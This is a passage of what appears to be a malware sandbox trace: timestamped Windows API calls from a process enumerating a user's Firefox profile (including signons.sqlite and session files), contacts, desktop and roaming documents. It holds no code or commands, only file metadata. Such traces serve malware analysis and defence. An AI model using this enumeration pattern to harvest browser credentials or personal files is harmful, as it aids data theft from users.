nFileSizeLow=0x11e4)) returned 1 [0043.831] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.832] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\search.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\search.json"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86d6a600, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x86d6a600, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x86ddca20, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x4153)) returned 1 [0043.832] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.832] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\secmod.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\secmod.db"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e2e85e0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7e2e85e0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x7e3348a0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0043.832] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.833] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.bak" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.bak"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe9c30810, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xe9c30810, ftLastAccessTime.dwHighDateTime=0x1d2fb2e, ftLastWriteTime.dwLowDateTime=0xe9c30810, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x24b)) returned 1 [0043.833] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.834] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.js"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe9c30810, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xbf3cf00, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xbf3cf00, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x24b)) returned 1 [0043.834] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.834] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\signons.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\signons.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86ddca20, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x86ddca20, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x8817ffa0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x50000)) returned 1 [0043.834] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.834] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\times.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\times.json"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7b79aeb0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7b79aeb0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x7b79aeb0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x1d)) returned 1 [0043.835] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.835] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\urlclassifierkey3.txt"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8868ee60, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x8868ee60, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xb486c00, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x9a)) returned 1 [0043.835] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.835] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webapps\\\\*", lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 0x2981c0 [0043.836] FindNextFileW (in: hFindFile=0x2981c0, lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 1 [0043.836] FindNextFileW (in: hFindFile=0x2981c0, lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 1 [0043.836] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webapps\\webapps.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webapps\\webapps.json"), fInfoLevelId=0x0, lpFileInformation=0x12be3c | out: lpFileInformation=0x12be3c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9f40760, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0x9f40760, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0x9f40760, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x2)) returned 1 [0043.838] FindNextFileW (in: hFindFile=0x2981c0, lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 0 [0043.838] FindClose (in: hFindFile=0x2981c0 | out: hFindFile=0x2981c0) returned 1 [0043.838] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.838] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webappsstore.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webappsstore.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86e4ee40, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x86e4ee40, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xd3d7c0b0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x18000)) returned 1 [0043.838] FindNextFileW (in: hFindFile=0x287bc8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 0 [0043.838] FindClose (in: hFindFile=0x287bc8 | out: hFindFile=0x287bc8) returned 1 [0043.839] FindNextFileW (in: hFindFile=0x287ae0, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 0 [0043.839] FindClose (in: hFindFile=0x287ae0 | out: hFindFile=0x287ae0) returned 1 [0043.839] FindNextFileW (in: hFindFile=0x2897e8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.839] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles.ini" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), fInfoLevelId=0x0, lpFileInformation=0x12ce5c | out: lpFileInformation=0x12ce5c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7b79aeb0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7b79aeb0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x7b79aeb0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x6f)) returned 1 [0043.839] FindNextFileW (in: hFindFile=0x2897e8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0 [0043.839] FindClose (in: hFindFile=0x2897e8 | out: hFindFile=0x2897e8) returned 1 [0043.839] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0 [0043.840] FindClose (in: hFindFile=0x288780 | out: hFindFile=0x288780) returned 1 [0043.840] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.840] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\RBf 3Yx-sqURA.xlsx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\rbf 3yx-squra.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xebb2c370, ftCreationTime.dwHighDateTime=0x1d4200a, ftLastAccessTime.dwLowDateTime=0x74c8ef30, ftLastAccessTime.dwHighDateTime=0x1d413b9, ftLastWriteTime.dwLowDateTime=0x74c8ef30, ftLastWriteTime.dwHighDateTime=0x1d413b9, nFileSizeHigh=0x0, nFileSizeLow=0x2912)) returned 1 [0043.840] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.840] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\sv0EwoB.pptx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\sv0ewob.pptx"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x418223b0, ftCreationTime.dwHighDateTime=0x1d41eec, ftLastAccessTime.dwLowDateTime=0xe053f150, ftLastAccessTime.dwHighDateTime=0x1d41558, ftLastWriteTime.dwLowDateTime=0xe053f150, ftLastWriteTime.dwHighDateTime=0x1d41558, nFileSizeHigh=0x0, nFileSizeLow=0x169f6)) returned 1 [0043.840] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.841] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.841] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.841] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\W wnadctvOXoBFfL_.swf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\w wnadctvoxobffl_.swf"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc3cf70a0, ftCreationTime.dwHighDateTime=0x1d411e2, ftLastAccessTime.dwLowDateTime=0x378ba7c0, ftLastAccessTime.dwHighDateTime=0x1d41f49, ftLastWriteTime.dwLowDateTime=0x378ba7c0, ftLastWriteTime.dwHighDateTime=0x1d41f49, nFileSizeHigh=0x0, nFileSizeLow=0x100dc)) returned 1 [0043.841] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.842] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.842] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.842] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\xzoftPay6Ttsn9BSphM.pptx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\xzoftpay6ttsn9bsphm.pptx"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc169b7a0, ftCreationTime.dwHighDateTime=0x1d41c1c, ftLastAccessTime.dwLowDateTime=0x782fd0b0, ftLastAccessTime.dwHighDateTime=0x1d41ca8, ftLastWriteTime.dwLowDateTime=0x782fd0b0, ftLastWriteTime.dwHighDateTime=0x1d41ca8, nFileSizeHigh=0x0, nFileSizeLow=0x700e)) returned 1 [0043.842] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.842] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\Y676JuyccEWcz.jpg" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\y676juyccewcz.jpg"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c27b90, ftCreationTime.dwHighDateTime=0x1d41d38, ftLastAccessTime.dwLowDateTime=0xed398c70, ftLastAccessTime.dwHighDateTime=0x1d41e47, ftLastWriteTime.dwLowDateTime=0xed398c70, ftLastWriteTime.dwHighDateTime=0x1d41e47, nFileSizeHigh=0x0, nFileSizeLow=0xb135)) returned 1 [0043.843] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.843] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.843] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.844] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0 [0043.844] FindClose (in: hFindFile=0x288740 | out: hFindFile=0x288740) returned 1 [0043.844] FindNextFileW (in: hFindFile=0x288ab8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0 [0043.844] FindClose (in: hFindFile=0x288ab8 | out: hFindFile=0x288ab8) returned 1 [0043.844] FindNextFileW (in: hFindFile=0x288be8, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.844] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\application data\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.844] FindNextFileW (in: hFindFile=0x288be8, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.844] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\contacts\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x2897f8 [0043.844] FindNextFileW (in: hFindFile=0x2897f8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.845] FindNextFileW (in: hFindFile=0x2897f8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.845] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\contacts\\Administrator.contact" (normalized: "c:\\users\\eebsym5\\contacts\\administrator.contact"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0x1ff8a75a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e)) returned 1 [0043.845] FindNextFileW (in: hFindFile=0x2897f8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.845] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\contacts\\desktop.ini" (normalized: "c:\\users\\eebsym5\\contacts\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec3e8400, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x19c)) returned 1 [0043.846] FindNextFileW (in: hFindFile=0x2897f8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.846] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a55460, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0x56a55460, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0x56a55460, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x4eb)) returned 1 [0043.847] FindNextFileW (in: hFindFile=0x2897f8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.847] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact" (normalized: "c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7abb8cc0, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0x7abb8cc0, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0x7abb8cc0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x4e8)) returned 1 [0043.847] FindNextFileW (in: hFindFile=0x2897f8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.848] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact" (normalized: "c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c4ad560, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0x6c4ad560, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0x6c4ad560, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x4e9)) returned 1 [0043.848] FindNextFileW (in: hFindFile=0x2897f8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.848] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25458f20, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0x25458f20, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0x25458f20, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x4f1)) returned 1 [0043.848] FindNextFileW (in: hFindFile=0x2897f8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.849] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3beee70, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xe3beee70, ftLastAccessTime.dwHighDateTime=0x1d2fb2e, ftLastWriteTime.dwLowDateTime=0xe3beee70, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x4f3)) returned 1 [0043.849] FindNextFileW (in: hFindFile=0x2897f8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0 [0043.849] FindClose (in: hFindFile=0x2897f8 | out: hFindFile=0x2897f8) returned 1 [0043.850] FindNextFileW (in: hFindFile=0x288be8, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.850] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\cookies\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.850] FindNextFileW (in: hFindFile=0x288be8, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.850] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\desktop\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x2897f8 [0043.850] FindNextFileW (in: hFindFile=0x2897f8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.850] FindNextFileW (in: hFindFile=0x2897f8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.850] FindNextFileW (in: hFindFile=0x2897f8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.851] FindNextFileW (in: hFindFile=0x2897f8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.851] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\1_IGBala.ods" (normalized: "c:\\users\\eebsym5\\desktop\\1_igbala.ods"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x946b8d80, ftCreationTime.dwHighDateTime=0x1d41e3a, ftLastAccessTime.dwLowDateTime=0xd4dbf1e0, ftLastAccessTime.dwHighDateTime=0x1d4146a, ftLastWriteTime.dwLowDateTime=0xd4dbf1e0, ftLastWriteTime.dwHighDateTime=0x1d4146a, nFileSizeHigh=0x0, nFileSizeLow=0xcd75)) returned 1 [0043.851] FindNextFileW (in: hFindFile=0x2897f8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.851] FindNextFileW (in: hFindFile=0x2897f8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.851] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\79PDyHsbK5pU9UV4xhi0.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\79pdyhsbk5pu9uv4xhi0.bmp"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d296970, ftCreationTime.dwHighDateTime=0x1d41c30, ftLastAccessTime.dwLowDateTime=0x6595f5d0, ftLastAccessTime.dwHighDateTime=0x1d41d9b, ftLastWriteTime.dwLowDateTime=0x6595f5d0, ftLastWriteTime.dwHighDateTime=0x1d41d9b, nFileSizeHigh=0x0, nFileSizeLow=0x3ebd)) returned 1 [0043.852] FindNextFileW (in: hFindFile=0x2897f8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.852] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\csqL6Um Aq.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\csql6um aq.rtf"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a4739d0, ftCreationTime.dwHighDateTime=0x1d41519, ftLastAccessTime.dwLowDateTime=0x55ddffd0, ftLastAccessTime.dwHighDateTime=0x1d41999, ftLastWriteTime.dwLowDateTime=0x55ddffd0, ftLastWriteTime.dwHighDateTime=0x1d41999, nFileSizeHigh=0x0, nFileSizeLow=0xe4b8)) returned 1 [0043.852] FindNextFileW (in: hFindFile=0x2897f8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.852] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec3e8400, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x11a)) returned 1 [0043.853] FindNextFileW (in: hFindFile=0x2897f8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.853] FindNextFileW (in: hFindFile=0x2897f8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.853] FindNextFileW (in: hFindFile=0x2897f8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.853] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\gWNn7Wqv.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gwnn7wqv.bmp"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66c30fb0, ftCreationTime.dwHighDateTime=0x1d418af, ftLastAccessTime.dwLowDateTime=0xddbc21d0, ftLastAccessTime.dwHighDateTime=0x1d41b1e, ftLastWriteTime.dwLowDateTime=0xddbc21d0, ftLastWriteTime.dwHighDateTime=0x1d41b1e, nFileSizeHigh=0x0, nFileSizeLow=0x7705)) returned 1 [0043.853] FindNextFileW (in: hFindFile=0x2897f8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.854] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\desktop\\iwXRkOL7ZjgXr_eoQRE.png" (normalized: "c:\\users\\eebsym5\\desktop\\iwxrkol7zjgxr_eoqre.png"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x718c3550, ftCreationTime.dwHighDateTime=0x1d41bbd, ftLastAccessTime.dwLowDateTime=0x5dd8e940, ftLastAccessTime.dwHighDateTime=0x1d41a41, ftLastWriteTime.dwLowDateTime=0x5dd8e940, ftLastWriteTime.dwHighDateTime=0x1d41a41, nFileSizeHigh=0x0, 